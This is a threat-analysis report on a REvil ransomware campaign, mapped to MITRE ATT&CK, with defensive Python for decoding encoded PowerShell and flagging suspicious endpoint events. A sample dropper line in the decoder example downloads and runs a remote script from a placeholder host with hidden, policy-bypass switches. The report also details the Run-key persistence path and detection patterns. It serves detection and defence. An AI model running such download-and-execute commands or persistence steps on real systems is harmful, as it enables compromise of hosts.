Deep Dive into Ransomware: Analyzing the Latest Campaign by ‘REvil’

Nina Kovacs — Exploit Research Analyst

Key Takeaways

  • Execution runs through PowerShell (T1059.001): a Base64-encoded command launched from an Office macro, with -ExecutionPolicy Bypass used to sidestep script restrictions.
  • Persistence is a Run-key value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (T1547.001), so the payload relaunches at every logon of the affected user without needing administrative rights.
  • C2 domains rotate frequently and resolve through fast-flux DNS, which frustrates blocklisting and takedown and complicates detection.

Executive Summary

Our analysis of a recent REvil ransomware intrusion revealed an execution chain built on PowerShell and routine evasion tactics. The malware used a sequence of TTPs (Tactics, Techniques, and Procedures) to establish persistence and maintain a foothold in the compromised environment. A PowerShell dropper fetched a second-stage executable; from there the actors moved laterally and exfiltrated data before deploying the ransomware payload, with significant impact on the targeted organizations.

Initial Access

During our investigation, we observed that the initial access vector of this REvil campaign was primarily phishing emails carrying malicious attachments (T1566.001 – Phishing: Spearphishing Attachment). The email headers showed no DKIM signature and no SPF authentication result for the sending domain, so the From address could not be verified and was readily spoofable. Once the recipient enabled macros, the attached document executed a Base64-encoded PowerShell command that started the infection (T1204.002 – User Execution: Malicious File). Because the macro runs only after the user enables it, this is user execution rather than T1203 – Exploitation for Client Execution, which covers exploitation of a software vulnerability; no vulnerability was needed to gain code execution on the victim's machine.
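The Base64-encoded command the macro launches is not readable on the command line, so the first analyst step is decoding it. The following is an added example, not code from the report or from REvil's tooling: it recovers the script from a powershell.exe command line and lists the evasion switches stacked around it. It assumes the encoding is PowerShell's -EncodedCommand form (UTF-16LE text, then Base64); the sample command line, its http://example.invalid URL and the helper names are constructed here for illustration.

```python
"""Decode powershell.exe -EncodedCommand payloads and list the evasion switches around them.
Added example; the sample command line below is constructed, not taken from the report."""
import base64
import re
from typing import List, Optional


def encode_powershell(script: str) -> str:
    """What a macro or dropper does: UTF-16LE, then Base64 (PowerShell's -EncodedCommand format)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _is_encoded_flag(token: str) -> bool:
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    if not token.startswith("-"):
        return False
    flag = token[1:].lower()
    return flag == "e" or (len(flag) >= 2 and "encodedcommand".startswith(flag))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script, or None if the command line carries no (valid) encoded command."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            blob = tokens[i + 1].strip("'\"")
            blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None


def suspicious_flags(cmdline: str) -> List[str]:
    """Switches droppers habitually combine; returned sorted so results compare directly."""
    found = set()
    if re.search(r"-(?:ep|exec|executionpolicy)\s+bypass", cmdline, re.I):
        found.add("bypass")
    if re.search(r"-(?:w|win|windowstyle)\s+hidden", cmdline, re.I):
        found.add("hidden")
    if re.search(r"-(?:nop|noprofile)\b", cmdline, re.I):
        found.add("noprofile")
    if any(_is_encoded_flag(t) for t in cmdline.split()):
        found.add("encoded")
    return sorted(found)


# Constructed sample (hypothetical URL); built with encode_powershell so it matches what a macro emits.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_CMDLINE = ("powershell.exe -NoP -NonI -W Hidden -ExecutionPolicy Bypass -EncodedCommand "
                  + encode_powershell(SAMPLE_SCRIPT))

if __name__ == "__main__":
    print("flags :", suspicious_flags(SAMPLE_CMDLINE))
    print("script:", decode_encoded_command(SAMPLE_CMDLINE))
```

The decoder deliberately accepts the short -e and -enc spellings, since droppers rarely write the full switch name; it returns None rather than raising on a blob that is not valid Base64, so it can be run unattended over a batch of command lines.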

Execution & Persistence

Following the initial execution, the PowerShell script acted as a dropper, downloading a second-stage payload from the actors' command and control server and saving it to C:\Users\Public\Documents\system.exe. C:\Users\Public is writable by every interactive user and rarely monitored, and a generic file name there attracts little attention. For persistence, the malware wrote a value named System under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pointing at that executable (T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder). Because the value lives under HKCU it requires no administrative rights; it re-executes at each logon of the affected user and so survives reboots.

Command and Control

The command and control (C2) infrastructure used in this operation was built for churn. The C2 domains were generated dynamically and changed frequently, and the payloads were hosted on legitimate cloud services. Traffic ran over HTTP/HTTPS (T1071.001 – Application Layer Protocol: Web Protocols), so it blended with ordinary web requests and was hard to single out at the perimeter. During network monitoring we observed traffic to domains such as abc123.hostingprovider.com; the name was fast-flux resolved, its A records rotating across many hosts with short TTLs, so blocking the address of the moment had little effect and takedown was impractical.

Lateral Movement & Discovery

The actors moved laterally with T1021.002 – Remote Services: SMB/Windows Admin Shares, reaching further hosts through their administrative shares. They did so with legitimate credentials obtained through credential harvesting, so the sessions looked like routine administrative SMB access and raised no alarms on their own. We also observed powershell.exe -ExecutionPolicy Bypass invocations used to enumerate Active Directory accounts and to map the network topology through Windows Management Instrumentation queries (T1047 – Windows Management Instrumentation).

Impact & Objectives

The final payload makes the objective plain: encrypt the victims' files and extort payment, with stolen data as additional leverage. The ransomware used strong encryption, leaving files unrecoverable without the actors' decryption key (T1486 – Data Encrypted for Impact). Before encrypting, the attackers ran exfiltration scripts that sent sensitive data to their C2 servers (T1041 – Exfiltration Over C2 Channel), giving them a lever that survives even a clean restore from backup. The ransom note gave payment instructions in cryptocurrency, chosen to maximise proceeds while minimising traceability.

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment: macro-enabled Office documents delivered by email for initial access.
  • T1204.002 – User Execution: Malicious File: the recipient enabling macros, which launched the first-stage PowerShell command.
  • T1059.001 – Command and Scripting Interpreter: PowerShell: Base64-encoded commands and -ExecutionPolicy Bypass invocations used for the dropper, discovery and payload installation.
  • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: the System value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing at the dropped executable.
  • T1071.001 – Application Layer Protocol: Web Protocols: C2 communication over HTTP/HTTPS to fast-flux domains, blending with ordinary web traffic.
  • T1021.002 – Remote Services: SMB/Windows Admin Shares: lateral movement with harvested credentials.
  • T1047 – Windows Management Instrumentation: account and network enumeration during discovery.
  • T1041 – Exfiltration Over C2 Channel: sensitive data sent to the C2 servers before encryption.
  • T1486 – Data Encrypted for Impact: the ransomware payload itself.

Detection Opportunities

  • Log process creation with full command lines (EDR or Sysmon Event ID 1) and alert on powershell.exe launched with -ExecutionPolicy Bypass, -WindowStyle Hidden or -EncodedCommand, particularly when the parent is an Office application; enable PowerShell Script Block Logging (Event ID 4104) so the decoded script content is captured even when the command line is encoded.
  • Monitor writes to the Run keys under HKCU and HKLM (Sysmon Event ID 13) and alert when a new value points into a user-writable path such as C:\Users\Public; complement this with a periodic autorun baseline so that drift is caught even if real-time telemetry is missed.
  • Baseline outbound DNS and HTTP(S) per host and flag names that resolve to many distinct addresses with short TTLs, newly observed domains contacted by non-browser processes, and large uploads to such domains in the window before encryption begins.
  • Watch for one workstation opening admin shares (ADMIN$, C$) on many hosts in a short window (Security Event ID 5140 on the targets, or Sysmon Event ID 3 connections to tcp/445 on the source); this fan-out is the signature of the lateral movement described above.
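The detection opportunities above, together with the Run-key persistence, fast-flux resolution and SMB lateral movement described in the earlier sections, can be expressed as rules over endpoint telemetry. The following is an added example, not code from the report: it runs four such rules over a handful of constructed Sysmon-style events. Field names mirror Sysmon Event IDs 1 (process create), 13 (registry set), 22 (DNS query) and 3 (network connect), but the records are simplified dicts made up here, the domain is the report's placeholder name, the addresses are documentation ranges, and the thresholds FASTFLUX_MIN_IPS and SMB_FANOUT_MIN_HOSTS are assumed values to be tuned per environment.

```python
"""Rule-based triage of endpoint telemetry for the behaviours in this report.
Added example: the events below are constructed Sysmon-style records, not data from the report."""
import re
from collections import defaultdict

# Rule 1: PowerShell launched with a policy bypass or an encoded command.
BYPASS_RE = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
ENCODED_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# Rule 2: a Run-key value (Sysmon Event 13 TargetObject) whose data points into a user-writable path.
# Legitimate per-user software (updaters, sync clients) also lives under C:\Users, so treat hits as triage input.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
USER_WRITABLE_RE = re.compile(r"^(?:C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp\\)", re.I)
# Rules 3 and 4 aggregate over the whole batch; thresholds are assumed and need per-environment tuning.
FASTFLUX_MIN_IPS = 4        # distinct A records seen for one name
SMB_FANOUT_MIN_HOSTS = 3    # distinct tcp/445 destinations from one process/user


def triage(events):
    """Return (rule, subject, detail) tuples for the events that match one of the four rules."""
    alerts = []
    dns_ips = defaultdict(set)
    smb_dsts = defaultdict(set)
    for ev in events:
        kind = ev["event"]
        if kind == "process_create":
            cl = ev["CommandLine"]
            if ev["Image"].lower().endswith(("powershell.exe", "pwsh.exe")) and (
                    BYPASS_RE.search(cl) or ENCODED_RE.search(" " + cl)):
                alerts.append(("suspicious_powershell", ev["Image"], cl))
        elif kind == "registry_set":
            if RUN_KEY_RE.search(ev["TargetObject"]) and USER_WRITABLE_RE.search(ev["Details"].strip('"')):
                alerts.append(("runkey_persistence", ev["TargetObject"], ev["Details"]))
        elif kind == "dns_query":
            dns_ips[ev["QueryName"].lower()].update(ev["QueryResults"])
        elif kind == "network_connect" and ev["DestinationPort"] == 445:
            smb_dsts[(ev["Image"].lower(), ev["User"])].add(ev["DestinationIp"])
    for name, ips in dns_ips.items():
        if len(ips) >= FASTFLUX_MIN_IPS:
            alerts.append(("fastflux_like_dns", name, sorted(ips)))
    for (image, user), dsts in smb_dsts.items():
        if len(dsts) >= SMB_FANOUT_MIN_HOSTS:
            alerts.append(("smb_fanout", f"{user} via {image}", sorted(dsts)))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = r"C:\Users\Public\Documents\system.exe"
# Constructed events: one benign and one malicious record per rule. The Base64 blob is a made-up stub.
SAMPLE_EVENTS = [
    {"event": "process_create", "Image": PS, "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"event": "process_create", "Image": PS, "CommandLine": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass "
     "-EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"event": "registry_set", "Details": DROPPED,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\System"},
    {"event": "registry_set", "Details": r"C:\Windows\System32\SecurityHealthSystray.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth"},
    *[{"event": "dns_query", "QueryName": "abc123.hostingprovider.com", "QueryResults": [ip]}
      for ip in ("203.0.113.10", "198.51.100.22", "192.0.2.77", "203.0.113.200")],
    {"event": "dns_query", "QueryName": "updates.example.com", "QueryResults": ["192.0.2.1"]},
    {"event": "dns_query", "QueryName": "updates.example.com", "QueryResults": ["192.0.2.1"]},
    *[{"event": "network_connect", "Image": DROPPED, "User": r"CORP\jdoe", "DestinationIp": ip, "DestinationPort": 445}
      for ip in ("10.0.0.11", "10.0.0.12", "10.0.0.13")],
    {"event": "network_connect", "Image": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

if __name__ == "__main__":
    for rule, subject, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}: {detail}")
```

Rules 1 and 2 fire on a single event, while rules 3 and 4 are aggregates over the batch: a fast-flux name looks ordinary in any one DNS record and only stands out once several resolutions are compared, and the same holds for SMB fan-out, where each connection alone is routine.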

Analyst Notes

REvil’s continual retooling calls for continuous monitoring and an adaptive response. Analysts should track changes in the group’s toolset and tactics rather than rely on static indicators, since the domains and file names seen here will not survive the next campaign. Because the intrusion began with a user enabling a macro, regular awareness training and phishing simulations, together with blocking macros from internet-sourced documents, materially reduce the chance of the initial foothold.

Source: Original Report